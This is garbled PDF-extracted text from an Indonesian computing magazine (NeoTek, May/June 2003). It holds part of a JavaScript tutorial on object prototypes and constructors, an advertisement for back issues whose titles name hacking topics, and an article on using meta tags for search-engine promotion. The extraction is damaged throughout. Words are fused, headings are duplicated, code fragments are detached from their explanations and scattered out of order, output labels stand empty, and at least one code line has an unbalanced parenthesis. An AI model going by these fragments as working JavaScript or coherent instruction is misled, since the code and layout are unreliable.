yang telah kita buat seperti berikut:

Outputnya:

Ternyata dari contoh di atas kita dapatmelihat dengan jelas bahwa propertiprototype ini tidak dapat mengubahnilai yang ditetapkan dalam konstruk-

tor. Kenapa demikian? Karena propertiprototype ini akan dijalankan terlebihdahulu sebelum konstruktor itu sen-diri, sehingga apabila dalam terdapatdefinisi untuk properti atau metodeyang ditambahkan dengan propertiprototype maka definisi dalam kon-struktor akan menimpa definisi yangdibuat dengan prototype.

Properti KonstruktorJika tiap konstruktor dari objekmemiliki properti prototype, makatiap instan dari objek akan memiliki

properti constructor. Properti ini akanmengembalikan fungsi konstruktordari objek yang dibuat instannya.Sintaksnya sebagai berikut:

Supaya lebih jelas kita akan coba de-ngan contoh di atas. Kita telah men-definisikan konstruktor untuk objekKendaraan, dan juga telah membuatdua buah instan objeknya yaituMobil dan Motor. Nah pada keduainstan Mobil dan Motor inilah terda-pat properti constructor yang akanmengembalikan fungsi konstruktor.

Objek pada JavaScriptObjek pada JavaScriptPada bagian ini, Hadi Purnomo ([email protected]) mengajak anda memahami

properti dari objek buatan sendiri pada JavaScript. Merupakan bagian terakhir dari sub-bahasan.

Bagian KBagian Ketigaetiga

P

 //untuk menambahkan propertinamaobjek.prototype.namaproperti = nilai

 //untuk menambahkan metodenamaobjek.prototype.namametode =

function(){  //statement metode}

document.write(Mobil.jenis)document.write("<br>")document.write(Motor.jenis)

daratdarat

Kendaraan.prototype.jenis="udara"

function Kendaraan(jenis){this.jenis = jenis}

document.write(Mobil.jenis)

document.write(Mobil.roda)

var Motor = new Kendaraan("darat")

document.write(Motor.roda)

namainstan.constructor

4

4

Kendaraan.prototype.roda = 4

darat

var Mobil = new Kendaraan("darat")

Page 38: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 38/50

NeoTutor

Mei/Jun 2003 NeoTek 37

Outputnya:

Catatan:

Baik properti prototype maupun con-structor juga dapat kita gunakan padaobjek-objek bawaan. Dengan propertiprototype kita dapat menambahkanproperti atau metode ke dalam objekbawaan. Misalnya objek String, sepertipada contoh berikut ini:

Outputnya:

Sedangkan properti constructor, jika di-gunakan pada objek bawaan makaoutput yang dihasilkan adalah outputseperti berikut:

Jadi jika kita gunakan properti con-structor pada instan objek String, makaakan menjadi seperti berikut ini:

Outputnya:

Membuat Library Objek Seperti namanya library merupakankumpulan dari objek-objek. Librarysebenarnya merupakan objek yangmemiliki suatu properti berupa arraydari objek. Misalkan kita mempunyaikonstruktor objek Kendaraan, kitamembuat instan objek sebanyak empatbuah, yaitu Mobil, Motor, Sepeda,

dan Becak.

Maka kemudian kita dapat mendefi-nisikan sebuah fungsi objek Librarydari instan-instan yang ada. Perhati-kan contoh berikut:

Pertama-tama definisikan sebuah pro-perti pada objek Library dengan tipearray yang memiliki elemen sebanyakargument yang dimasukkan. Lihatlahkembali pembahasan tentang properti

arguments pada bagian sebelumnya.Arguments-arguments ini sendiripada paraktisnya adalah nama-namainstan objek yang dibuat. Lalu defini-sikan tiap elemen dari array yaituberupa arguments yang dimasukkan.

Sehingga kemudian kita dapat mema-sukkan tiap instan yang telah kitadefinisikan di atas ke dala Librarydengan cara berikut:

Untuk mengakses properti-propertiobjek dalam Library kita dapat meng-anggap properti jenis dari objekLibrary sebagai array biasa sepertiberikut:

Outputnya:

Sampai di sinilah pembahasan kita ten-tang objek buatan sendiri pada Javascript.Pada bagian berikutnya kita akan mulaimembahas objek-objek bawaan Javascript.Selamat Belajar!

function Kendaraan(nama,roda){this.nama=namathis.roda=roda}var Mobil = new Kendaraan("Mobil",4)var Motor = new Kendaraan("Motor",2)var Sepeda = new Kendaraan("Sepeda",2)var Becak = new Kendaraan("Becak",3)

document.write(Mobil.constructor)document.write("<br>")document.write(Motor.constructor)

for (i=0;i<Bundel.jenis.length;i++){document.write(Bundel.jenis[i].nama)document.write(" memiliki ")document.write(Bundel.jenis[i].roda)document.write(" roda.<br>")}

mobil memiliki 4 roda.motor memiliki 2 roda.

sepeda memiliki 2 roda.becak memiliki 3 roda.

var kalimat = new StringString.prototype.keterangan="Ini sebuah

kalimat"var kata = new Stringdocument.write(kata.keterangan)

var Bundel = newLibrary(Mobil,Motor,Sepeda,Becak))

var kalimat = new Stringdocument.write(kalimat.constructor)

function Library(){this.jenis = new Array(arguments.length)

for (i=0;i<arguments.length;i++){this.jenis[i]=arguments[i]}

function String() { [native code] }

function Kendaraan(jenis){ this.jenis = jenis }function Kendaraan(jenis){ this.jenis = jenis }

Ini sebuah kalimat

function namaobjekbawaan() { [native code] }

 Penawaran khusus edisi lama NeoTek (Vol. II dan III, tentang hcking/security).

Rp15.000,-/eks (dengan CD)Rp8.000,-/eks (tanpa CD)

Hubungi: Marni. Tel. 548 1457([email protected])

Ada apa saja di edisi lama NeoTek?

II/1 Oktober 2001Hacking dengan Back Orifice

II/2 November 2001Dasar-Dasar Remote Hacking

II/3 Desember 2001Footprinting: Intelijen Awal

II/4 Januari 2002Software Cracking

II/5 Februari 2002Meng-hack NT Server 

II/6 Maret 2002SoftICE: Serial Fishing

II/7 April 2002Mengintip Password dengan DSniff 

II/8 Mei 2002Superscan: Scanning Tool setara Nmap

II/9 Juni 2002Skrip mIRC dan EggDrop

II/10 Juli 2002Legion: Jalan-Jalan ke Komputer Orang

II/11 Agustus 2002Hacking & PC Security: Virus & Trojan

II/12 September 2002Password Cracking: Seni & Tekniknya

III/1 Oktober 2002Gaining Access: Remote Password Cracking

III/2 November 2002Sisi Gelap Internet: Carding

III/3 Desember 2002Mendeface Situs Web

III/4 Januari 2003Linux Hacking: Apache Server 

III/5 Februari/Maret 2003

VoIP Merdeka dan e-Commerce SecurityIII/6 Maret/April 2003Memahami Exploit: C dan Perl Exploit

III/7 April/Mei 2003Memahami Java & Trojan Terbaru 2003

Masih Ada: NeoTek (klasik) Vol. I(untuk pemula dalam ber-Internet)

Bundel I: NeoTek Vol. I No. 1-6Rp25.000,-

Bundel I: NeoTek Vol. II No. 7-12Rp25.000,-

NeoTek Vol I (per nomor lepas 1 s/d 12)Rp3000,- per eks.

Mengingat keterbatasan tempat, artikelserial mengenai micro controller unit

MCU HC08 terpaksa ditunda pemuatan-nya pada edisi ini dan akan dimuat mulaiedisi mendatang.

Artikel-artikel mengenai MCU HC08telah dimuat mulai awal Vol. III, yaitu:

1. Programmer MC68HC908-KX8

2. Merakit Hardware Digital Clock 

3. Tutorial Assembly Language

4. Tukar Otak Proyek Digital Clock (1)

5. Tukar Otak Proyek Digital Clock (2)

6. Mini EVM Development Tool

7. Assembly: Mengenal Hardware (1)

Yang ditunda pemuatannya;

8. Assembly: Mengenal Hardware (2)

Ketinggalan MembacaNeoTek?

Edisi lama: harga khusus &bebas ongkos kirim

Penundaan PemuatanArtikel Serial

Page 39: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 39/50

NeoStyle

38 NeoTek Mei/Jun 2003

eta Tag adalah tag HTML yang memungkinkan se-orang webmaster menyajikan informasi mengenaisebuah dokumen HTML atau halaman web. Infor-

masi ini disebut sebagai meta data. Meta tag dan meta datatidak tampak ketika kita membuka atau mengakses sebuahhalaman web, karena keduanya memang bukan merupakanisi informasi (content) itu sendiri dari sebuah halaman web.Namun keduanya (meta tag dan meta data) dapat kita lihatbila kita melakukan View (Page) Source kode HTML-nya,

yaitu pada bagian kepala (header) dokumen HTML, di antaratag <head></head>. Sintaks dari sebuah meta tag:

<meta name="…" content="…" />

Catatan:1. Meta tag selalu berada di antara tag <head> </head> dan tidak memiliki

tag penutup.2. Nilai (value) dari atribut content harus memakai tipe data CDATA (lebih

lanjut: http://www.w3.org/TR/REC-html40/types.html).3. Tidak boleh terdapat line break (menekan Enter pada keyboard) dalam

tiap-tiap meta tag

Tidak ada ketentuan baku, informasi apa saja yang dapat atautidak dapat ditulis dalam sebuah meta tag. Namun memangada meta tag yang digunakan oleh browser (seperti meta cha-racter set), ada meta tag yang digunakan oleh search engine

(seperti meta description), ada meta tag untuk berkomunikasidengan server (seperti meta expires), dan ada meta tag yanghanya untuk dibaca oleh manusia atau search engine internal/intranet (seperti meta author). Tulisan ini akan difokuskanpada yang kedua, yaitu meta tag untuk search engine (global/internet), khususnya dalam kaitannya dengan promosi situs.

Tiap-tiap search engine di dunia maya memiliki cara, rumusan(atau, "algoritma") tersendiri dalam melakukan pemeringkat-an sebuah situs.Algoritma ini di antaranya mencakup carasearch engine (dalam hal ini, robot/spider/crawler) membaca,menginterpretasikan, dan memperlakukan meta tag. Sampaidengan saat ini diyakini bahwa tidak ada satu pun "orang luar"yang mengetahui dengan persis algoritma yang digunakanoleh masing-masing search engine.Memang, ada beberapasearch engine yang memiliki dokumentasi yang dapat dibacaoleh publik mengenai algoritma yang digunakannya; namun,tetap diyakini bahwa informasi di dalamnya pun tidak seratuspersen sebagaimana adanya. Meskipun demikian,kita dapatmemperoleh gambaran mengenai hal tersebut dengan meng-amati perilaku dari search engine tersebut, dengan memban-dingkan berulang-ulang antara input pencarian yang kitamasukkan dengan hasil penemuan informasi (retrieval)-nya.Maka, uraian ini pun kiranya menggunakan pendekatan ini.

Meta tag hadir sejak HTML 3.2 dan didukung oleh sebagiansearch engine dengan maksud utama, seperti telah disebutkandi atas, menyajikan informasi mengenai sebuah halaman web;khususnya bagi halaman-halaman web yang kurang memili-

ki informasi yang bersifat teks. Misalnya, halaman web yanghanya berisi gambar (image)—tanpa atribut "alt" pada tag-

nya, halaman web yang full Flash, halaman yang mengguna-kan frame—tanpa keterangan yang memadai pada tag<noframes></noframes>-nya,dan sebagainya.Padahal, sebuahsearch engine (dalam hal ini, index/catalogue) pada umumnyamengambil informasi dari yang bersifat teks tadi,yang akanditampilkan pada pengguna search engine sebagai hasil retrieval.

Sayang sekali, dalam kenyataannya tidak semua webmastermenerapkan secara benar penggunaan meta tag sesuai denganmaksud utamanya; dan justru lebih banyak yang menyalah-

gunakannya dengan melakukan spamming.Artinya, infor-masi yang disajikan pada meta tag sering dimanipulasi se-hingga tidak berhubungan sama sekali dengan isi (content)situsnya, dengan harapan banyak orang "tersasar" ke situs-nya. Tujuannya untuk meningkatkan traffic dan ranking darisitusnya. Semakin banyak traffic artinya semakin banyakpeluang untuk menghasilkan uang (meskipun anggapan initelah terbukti salah, karena kualitas kunjungan ternyatamasih lebih penting).

Tetapi sekarang spamming dengan meta tag ini sudah dapatdideteksi oleh kebanyakan search engine.Algoritma yanglebih modern (algoritma bisa berubah setiap saat!) membuatsearch engine semakin cerdas dalam menentukan halaman-halaman web mana yang telah melakukan spamming, dansebagian langsung memfilternya (tidak didaftarkan ke dalamindex). Namun hal yang terakhir disebut ini hanyalah reaksipertama dari kebanyakan search engine besar terhadap tin-dakan spamming yang sudah-sudah.

Reaksi kedua dari search engine yang cukup penting untukdicatat, sebelum kita masuk ke inti uraian pemanfaatan metatag, adalah: search engine mengurangi secara signifikan per-hatian terhadap meta tag (terkecuali meta robots). Informasidi dalam meta tag tidak lagi serelevan (sepenting) dahulu bagikebanyakan search engine sekarang ini dalam menentukan isisebuah halaman web, dengan demikian juga hasil retrieval-nya.

Bahkan faktanya, sekarang ini tidak semua search engine di in-ternet dirancang untuk dapat membaca meta tag.Dan bagi search

engine yang dapat membaca meta tag, tidak semua meta tagdidukung olehnya. Kalaupun ada meta tag yang didukung,masihada kemungkinan untuk tidak didukung secara penuh. Dalamuraian selanjutnya akan ditunjukkan hal-hal tersebut.Faktalainnya, kebalikannya sekarang ini tidak sulit kita jumpai situs-situs yang berada pada peringkat atas (sepuluh besar) padahasil retrieval tanpa menggunakan meta tag sama sekali.

Namun,bila memang demikian,apakah kita bisa mengabaikanmeta tag sama sekali ? Jawabnya tentu saja bisa meskipuntidak harus. Meta tag akan cukup memberikan andil bagi pro-mosi situs ketika kita menggunakannya secara benar (sesuaidengan maksudnya).Maka,hubungan antara meta tag denganpromosi situs dalam uraian ini adalah: bagaimana menyajikanmeta data (informasi dalam meta tag) secara tepat agar spiderdapat menyerap informasi ini dengan baik dan mendaftarkannyapada index. Sehingga apabila ada para pengguna (user) search

Metatag untuk Promosi SitusMetatag untuk Promosi SitusBagaimana agar situs kita masuk dalam ranking atas search engine utama seperti Google,Yahoo!, AltaVista, dan lainnya? Juneman Abraham ([email protected]) membagikan

pengalamannya mempromosikan situs dengan memanfaatan meta tag.

M

WWEEB SB SIITTE DE DEEVVEELLOOPPMMEENNTT

Page 40: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 40/50

NeoStyle

Mei/Jun 2003 NeoTek 39

engine yang mencari informasi yang berhubungan dengan te-ma situs kita, ia dapat dengan mudah menemukannya padahasil retrieval.Artinya, mereka sampai pada situs kita karenamereka memang sedang mencari situs kita (situs kita relevandengan kebutuhan pencariannya). Dengan demikian, trafficdan ranking yang tinggi pun sudah di depan mata.

Sebenarnya hanya ada dua meta tag yang penting untuk pro-mosi situs, yaitu meta description dan meta keywords; danyang terpenting di antaranya adalah meta description. Dalam

kaitannya dengan promosi situs juga, meta PICS-Label perludipertimbangkan, dan meta robots perlu diketahui.

Meta DescriptionSintaks meta description:

<meta name="description" content="description" />

Meta description memuat satu atau dua kalimat yang meru-pakan ikhtisar (summary) atau abstraksi mengenai isi sebuahhalaman web (web page),termasuk apa yang ingin kita tawar-kan dari situs kita.Kalimat ini tidak nampak ketika kita meng-akses sebuah halaman web dengan browser, tetapi akan ditam-pilkan sebagai hasil retrieval oleh search engine yang men-dukung meta description. Hampir semua search engine men-dukung meta description, meskipun tidak secara penuh. Yangmemberi dukungan penuh (selalu menampilkan meta descrip-tion) misalnya: AltaVista (www.altavista.com) dan AllTheWeb(www.alltheweb.com).

Kalimat dalam meta description adalah kalimat yang deskriptif (menggambarkan) dan memuat pemikiran atau pun sinonim(pengkalimatan lain) dari pemikiran mengenai isi halamanweb kita. Hal ini bisa dibandingkan dengan sinopsis sebuahfilm atau buku, atau bagian abstrak dari sebuah karangan il-miah. Seperti halnya sinopsis atau abstrak, isinya sudah tentuharus sesuai dengan content apa adanya, tidak melebihkanatau mengurangi substansi dari suatu content. Di samping itu juga memiliki arti yang jelas dilihat dari susunan kalimatnya(yang efektif, wajar, tidak dibuat-buat).

"Kriteria-kriteria" semacam di atas menjadi penting karenaisi dari meta description akan dibaca oleh manusia pada entrihasil retrieval dari beberapa search engine. Bayangkan, misal-nya, bila apa yang kita deskripsikan kemudian terbukti bohong(tidak apa adanya) pada saat user meninjau isi situs kita.Akibatnya harus siap kita tanggung, yaitu user tsb tidak akanpernah lagi mengunjungi situs kita karena pengalaman takmenyenangkan yang dialaminya, yaitu membuang-buangwaktu untuk menelusuri informasi yang sebenarnya tidaksedang ia cari saat itu. Kita akan mudah kehilangan keperca-yaan dari user. Bukankah hal ini malah kontraproduktif de-ngan maksud promosi situs?

Di samping kriteria yang telah disebutkan, kalimat dalammeta description juga hendaknya dapat memotivasi pengu-njung untuk mengetahui lebih jauh apa isi halaman web kita.Karenanya, kita bisa menggunakan kalimat yang dapat me-

narik perhatian,meskipun tetap harus ada faktanya. Dengandemikian, kalimat dalam meta description sesungguhnya ha-nyalah menguatkan isi (content) dari halaman web. Artinya,content-nya harus "beres" terlebih dahulu dalam hal kuali-tasnya (struktur, kejelasan informasi,dsb).

Kriterita lainnya yang lebih teknis adalah: tempatkan frasa(kelompok kata) yang kita anggap penting pada awal kalimat.Memang ada baiknya kalau kita bisa memuat satu atau dua

kata kunci (keyword) terpenting di dalam meta description(misalnya berupa produk atau jasa yang kita tawarkan, seperti:"cd/vcd ", "sepatu", "penerjemah","makanan",dsb). Namun, jangan mengulang keyword yang sama lebih dari tiga kali didalam meta description agar tidak dianggap spider sebagaispamming. Lain keyword lain pula ranking halaman situs-situs pada hasil retrieval. Karena itu, jangan berusaha mema-sukkan sebanyak mungkin keyword, yang membuat kalimatmenjadi tidak wajar. User yang membaca akan kurang ter-tarik untuk mengklik situs Anda.

Kemudian, untuk menghemat tempat (karena kita dibatasi—dijelaskan nanti), kita tidak perlu menempatkan nama insti-tusi atau perusahaan kita di dalam meta description jika be-lum banyak dikenal orang; karena, bila memang demikian,sangat kecil kemungkinan user akan mencari nama tersebutpada search engine. Sebagai gantinya, tuliskan apa saja yanginstitusi kita hendak tawarkan (produk barang, jasa, dsb).

Apabila kita kurang ide untuk menulis kalimat meta descrip-tion, penulis menyarankan untuk meng-copy/paste 1–2 kali-mat dalam paragraf pertama dari content kita, yang kira-kiramampu memberi gambaran mengenai apa isi halaman web kita.

Panjang kalimat dalam meta description sebaiknya cukup20–25 kata atau 150–200 karakter. Usahakan jangan lebihatau kurang. Apabila lebih dari itu, kalimat mungkin terlalupanjang dan harus terpotong di tengah pada hasil retrieval,sehingga kelihatan kurang profesional pada saat dibaca. Disamping itu, manusia yang membaca tidak bisa memperoleh

gambaran yang utuh mengenai situs kita (ini sebab mengapakita perlu menempatkan keyword-keyword terpenting diawal-awal kalimat).

• Situs EvaBun muncul di ranking kesembilan pada hasil retrieval Google, dengan keyword "gaun pengantin". Situs ini tidak menggunakan meta tag untuk search engine sama sekali.

• Melaka Street Restoran mempromosikan dirinya melalui situs eGenting, muncul di ranking kesembilan pada hasil retrieval AltaVista, dengan keyword 

"restoran chinese food". Meta description yang lengkap dari halaman ini adalah:"Melaka Street Restoran. New food outlet at Lebuh Ampang, Kuala Lumpur city. Local delicacies comprising Mamak, Malay, Indian and Chinese food. Its

 specialties are capati, roti canai, tosai and mee goreng. Sold at reasonable prices.Food sold are halal."

 Sayangnya pada hasil retrieval, deskripsi ini terpotong sampai "tosai and…" karena terlalu panjang. Informasi yang kiranya cukup penting bahwa makanan

 yang dijualnya halal, tidak kelihatan. Kalau saja ditulis sebagai berikut, tentuakan lebih efektif:

Pada <title></title>:"Melaka Street Restoran, new food outlet at Lebuh Ampang, Kuala Lumpur"

Pada meta description:"We comprise Mamak, Malay, Indian, Chinese food. Food sold are halal.

 Specialities: capati, canai, tosai, mee goreng. At a reasonable prices!"

 Jika Melaka Restoran memiliki situs sendiri, ia dapat menempatkan meta des-cription ini pada halaman muka (homepage)—index.html, karena merupakan gambaran keseluruhan. Pada halaman berikutnya title dan meta description-

 nya bisa lebih khusus lagi mengenai masing-masing makanannya.

Catatan: eGenting cukup baik dalam hal menuliskan meta description di 

setiap halaman -nya, khususnya yang menginformasikan produk, sehingga penulis juga dapat menjumpai eGenting kembali pada rangking kesembilan,dengan keyword "restoran seafood".

Page 41: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 41/50

Pentingnya menjaga panjang kalimat dapat kita mengerti sbb:Katakanlah situs kita muncul pada entri kesatu pada sepuluhentri teratas, namun tentunya user akan lebih termotivasiuntuk meng-klik entri dari situs yang bisa lebih utuh meng-gambarkan dirinya (dan itu mungkin situs milik saingan kita),karena situs itu dianggap lebih relevan bagi si user. Demikianpula halnya akan terjadi dengan kalimat yang terlalu pendek,yang kurang deskriptif.

Bila kita merasa bahwa kita terlalu dibatasi dengan kriteria150–200 karakter, kemungkinan isi dari halaman web terse-but terlalu banyak. Kita bisa mengambil solusi dengan mem-bagi halaman tersebut menjadi dua atau bahkan tiga halamanyang memiliki meta description masing-masing; karena, se-perti yang telah disebut di atas, meta description memangmenggambarkan isi sebuah halaman web.Artinya juga, kita"wajib" menempatkan meta description pada setiap halamanweb (web page) di dalam situs (web site) kita. Setiap halamanmemiliki tema masing-masing, sehingga juga memiliki gam-baran (description) masing-masing yang tentu berbeda antarasatu halaman dengan lainnya (misalnya, halaman "Profil"berbeda deskripsinya dengan "Produk"). Kecuali adalah padahalaman muka (homepage)—index.html—biasanya meta des-

cription diisi dengan gambaran secara keseluruhan mengenaiisi sebuah situs (web site).

Seperti yang telah kita lihat di atas, meta description cukupmemegang peranan pada hasil retrieval.Lalu, bagaimana jikasebuah halaman tidak memiliki meta description pada<head></head>-nya? Ini akan menyadarkan kita akanpentingnya meta description.Ada dua kemungkinan yangmuncul pada hasil retrieval, sbb:

Menggunakan Snippet1) Search engine seperti Google (www.google.com), Teoma(www.teoma.com),Yahoo (www.yahoo.com) dan AllTheWebakan memberikan sebuah "snippet", yakni sebuah kutipanyang diambil dari halaman web tersebut, di mana di dalam-

nya terkandung kata atau frasa yang sedang dicari (untukGoogle dan Yahoo diberi tanda tebal); sehingga user dapatsegera mengetahui dalam konteks apa kata atau frasa yangdicarinya itu digunakan dalam informasi halaman web tsb.

Catatan untuk Google dan Yahoo:a. Google termasuk search engine yang mendukung meta des-cription tidak secara penuh, artinya meta description tidak se-lalu ditampilkan pada hasil retrieval, sehingga dalam penga-laman kita mungkin akan lebih sering mendapati snippet dari-pada meta description.

Namun, dari hasil pengamatan berkali-kali, penulis dapatmenyimpulkan:

Pertama, Google menampilkan meta description apabila key-word (single word) yang dicari terdapat di dalam <body></body> dengan frekuensi sedikitnya 4 (empat) kali dan key-

word yang sama tsb terdapat sedikitnya 1 (satu) kali di dalammeta description.Apabila keyword yang dicari lebih dari satu

kata (sebuah phrase), maka salah satu kata dalam keyword tsbharus terdapat di dalam <body></body> sedikitnya 4 kalidan terdapat dalam meta description sedikitnya 1 kali. Katalainnya harus terdapat sedikitnya 1 kali dalam <body></body>dan 1 kali dalam meta description. Hal ini nampaknya ber-laku juga bagi Yahoo—yang kini juga di-backup—oleh Google.

Kedua, Google menampilkan meta description apabila keyword

yang dicari persis terdapat di dalam meta description dari se-buah halaman yang menggunakan frame yaitu tidak terdapatketerangan yang memadai pada tag <noframes> </noframes>-nya, atau dari sebuah halaman yang tidak mengandung teks(hanya berisi Flash, JavaApplet, dsb).

NeoStyle

40 NeoTek Mei/Jun 2003

• Dengan snippet yang dimunculkan oleh Google pada hasil retrieval, kitadapat segera mengetahui dalam konteks apa keyword "ikan koi"

digunakan.

• Meta description dari situs eBook Perk embangan dan Psik ologi Anak Balita muncul pada hasil retrieval Google, dengan keyword "buku psikologi anak".

 Jika kita masuk ke situs tsb, kita akan menjumpai 1 kata "buku", 1 kata"psikologi", 1 kata "anak" dalam meta description; 18 kata "buku", 2 kata

"psikologi" dan 58 kata "anak" dalam <body></body>.

• Meta description dari halaman Garuda Indonesia muncul pada hasil 

 retrieval Google, dengan keyword "garuda indonesia uk" (halaman webtsb hanya berisi Flash). Hal ini karena kata-kata dalam keyword yang dicari 

terdapat dalam meta description.

• Meta description dari halaman Millenium Bowling Club muncul pada hasil 

 retrieval Google, dengan keyword "club bowling indonesia" (halaman webtsb hanya berisi JavaApplet), karena kata-kata dalam keyword yang dicari terdapat di dalam meta description.

• Meta description dari situs Kamus Jot muncul pada hasil retrieval Google,dengan keyword "kamus jerman". Jika kita masuk ke situs tsb, kita akan menjumpai 2 kata "kamus", 1 kata "jerman" dalam meta description; 6 kata "kamus" dan 1 kata "jerman" dalam <body></body>. Perhatikan

 bahwa deskripsi situs ini ada dua macam: satu dari meta description (tepat di bawah judul situs) dan satu lagi dari ODP (setelah kata Description ).

Page 42: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 42/50

b. Google selalu menggunakan deskripsi dari editor Open Dir-ectory Project (http://dmoz.org), jika situs yang dicari terdaf-tar pada direktori tsb. Jadi deskripsi yang muncul pada hasilretreival dapat merupakan:dari meta description dan atau dariODP. Sedangkan untuk Yahoo, bila sebuah situs telah terdaftardi direktori Yahoo (http://dir.yahoo.com/), maka deskripsiyang muncul hanya satu, yaitu deskripsi dari editor Yahoo.

Menggunakan Frasa

2) Search engine seperti AltaVista akan menampilkan frasaatau kalimat yang terdapat pada awal sebuah halaman web.Konsekuensinya, bila awal dari sebuah halaman web berupateks-teks link untuk menu (navigasi) situs, maka itu jugayang akan ditampilkan.

Catatan untuk AltaVista:

Apabila sebuah halaman web memiliki meta description,AltaVista akan selalu memunculkan meta description-nya.Namun apabila meta description-nya cukup pendek,AltaVistaakan menampilkan meta description bersama dengan frasaatau kalimat awal tadi.

Akhirnya, ingat sekali lagi bahwa tujuan meta description yang

utama bukanlah untuk mencapai ranking yang tinggi, melain-kan memberikan informasi yang akurat mengenai sebuahhalaman web. Maka evaluasilah meta description Anda hariini, bila Anda memang telah menggunakannya. Coba lakukanpencarian terhadap situs Anda sendiri pada search engine,bagai-mana deskripsi yang muncul? Buruk? Baik? Selanjutnyaterserah Anda…

Meta KeywordsSintaks meta description:

<meta name="keywords" content="keyword1, keyword2,keyword3, keyword4, dst " />

Meta keywords adalah kata-kata dan atau frasa kunci yang

mewakili isi (content) halaman web kita,yang kita perkirakanakan diketikkan user dalam kotak pencarian pada search enginepada saat mereka mencari informasi yang berhubungan dengantema situs kita. Jumlah keyword sebaiknya cukup 6-10, dipi-sahkan satu dengan lainnya dengan tanda koma dan satu spasi(lihat sintaks di atas), atau sekitar 100-120 karakter (termasukspasi dan tanda koma). Hampir semua search engine sangatkurang memperhatikan meta keywords, karena tingginyapenyalahgunaan pada waktu yang lalu. Namun, search engineseperti Teoma dan Inktomi (yang kabarnya akan diakuisisiYahoo) cukup memberi perhatian.

Beberapa hal yang perlu diperhatikan dalam menyusun metakeywords:

1. Setiap halaman web tentunya memiliki isi yang berbeda,untuk itu tempatkan meta keywords pada <head></head>setiap halaman web dari situs kita.

2. Sedapat mungkin, cantumkan keyword berupa frasa (phrase),karena ini lebih spesifik, jangan hanya kata (single word). Per-timbangkan bahwa user jarang mencari "buku" saja, tetapi iamungkin ingin mencari "buku Pramoedya", "buku fisiologikedokteran", dsb.

3. Setiap keyword yang dicantumkan pada meta keywordsharus sudah muncul di dalam <body></body> sekurang-ku-rangnya 4 (empat) kali. Ini menegaskan bahwa keyword tsb

memang spesifik dan relevan (berhubungan) dengan isi ha-laman web kita. Jadi, jika terdapat minimal empat keywordyang sama di dalam <body></body>, maka ini akan diwakilioleh satu keyword pada meta keywords.

4. Apabila keyword itu berupa sebuah kata (single word), jangan pernah mengulangnya. Apabila keyword itu berupafrasa, jangan mengulang kata yang terdapat dalam frasa itudalam keyword yang lain lebih dari 3 (tiga) kali, agar tidakdianggap spamming oleh spider.

Contoh:Spamming: <meta name="keywords" content="vcd, film,

  jerman, vcd, dokumenter, jerman" />

Bukan spamming: <meta name="keywords" content="jualvcd, rental vcd, vcd film jerman, dokumenter jerman, filmgerman" />

6. Keyword dapat diambil dari tag <title></title> dan ituditempatkan sebagai keyword-keyword awal.

Contoh:Jika pada sebuah halaman:<title>Ruang Konsultasi Online Kesehatan ReproduksiRemaja</title>,

pada meta keywords:<meta name="keywords" content="konsultasi online,kesehatan reproduksi remaja, … " />

7. Keyword sebaiknya ditulis dalam huruf kecil semua (lower-

case). Sekalipun sebuah search engine membaca keyword sec-ara case senstive (huruf kapital dan huruf kecil dibedakan),statistik menunjukkan bahwa sebagian besar user menge-tikkan input pencariannya dalam huruf kecil.

8. Kita dapat menempatkan misspelled words dalam keyword(frasa) kita.Seperti: Jogjakarta,Yogyakarta;thesis, tesis; modern,moderen; metamorfosa,metamorfose, metamorfosis;Perancis,Prancis; foto, photo; komputer, computer; dan sebagainya. Jikasitus Anda dalam bahasa Inggris, lihat daftar yang terdapat padahttp://www.library.cornell.edu/tsmanual/TSSU/comis1.htmlmungkin akan membantu Anda.

NeoStyle

Mei/Jun 2003 NeoTek 41

• Bila tidak ada meta description, kata-kata atau kalimat-kalimat awal darii  halaman web yang akan dimunculkan.

• Meta description dari PenerbitNet ini hanya berbunyi, "Majukan DuniaBuku Indonesia!" Masih ada tempat yang bisa dimanfaatkan untuk lebih

 menggambarkan situs ini.

• Situs useit.com milik Jakob Nielsen muncul pada hasil retrieval Googledengan keyword "Jacob Neilson", padahal pada <body></body>-nya

 sama sekali tidak terdapat kata "Jacob" maupun "Neilson". Hal ini dimungkinkan karena pada meta keywords-nya ditulis sbb:

<meta name="keywords" content="Jakob Nielsen, Jacob Nielsen, JakobNielson, Neilsen, Neilson, …>

Kita dapat menambahkan misspelled words dan sinonim suatu kata pada meta keywords, asalkan morfologi katanya berdekatan.Google masih memperhatikan meta keywords! 

Page 43: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 43/50

9. Kita tidak dapat menggunakan sinonim yang terlalu jauhmorfologi katanya, seperti kursus dan pelatihan; kecuali katayang menjadi sinonim itu terdapat juga di dalam <body></body>(lihat nomor 3). Sebab, bila tidak demikian, pencatuman sino-nim ini akan dianggap spamming.

10. Algoritma modern beberapa search engine mengarah padaapa yang dinamakan "Search Engine Themes" untuk kete-gorisasi informasi. Dalam hal ini, penting untuk menempat-

kan 1–2 keyword yang sama pada meta keywords (atau juga,meta description) pada setiap halaman web kita. Karena kitamempertimbangkan nomor 3 (lihat di atas), maka keywordini sebaiknya juga terdapat di dalam <body></body>.

Contoh: jika situs Anda menjual kamera digital, usahakan agardi setiap halamannya terdapat frasa "kamera digital". Hal iniuntuk mengindikasikan kepada spider bahwa situs kita me-miliki satu kesatuan tema ("kamera digital"). Satu kesatuantema berkaitan dengan relevansi (dengan input pencarian yangsesuai dengan tema situs kita), dan relevansi dapat mening-katkan ranking situs (website).

11. Yang perlu diketahui:

a) Pada keyword yang berupa frasa berlaku permutasi.Artinya,keyword "hotel indonesia" dapat muncul pada hasil retrievaldengan input "indonesia hotel".

b) Apabila ada keyword "perikanan" maka ini sudah mencakup"ikan",artinya halaman web Anda yang berisi dapat "perikanan"muncul pada hasil retrieval dengan input "ikan".Tetapi, tidaksebaliknya.

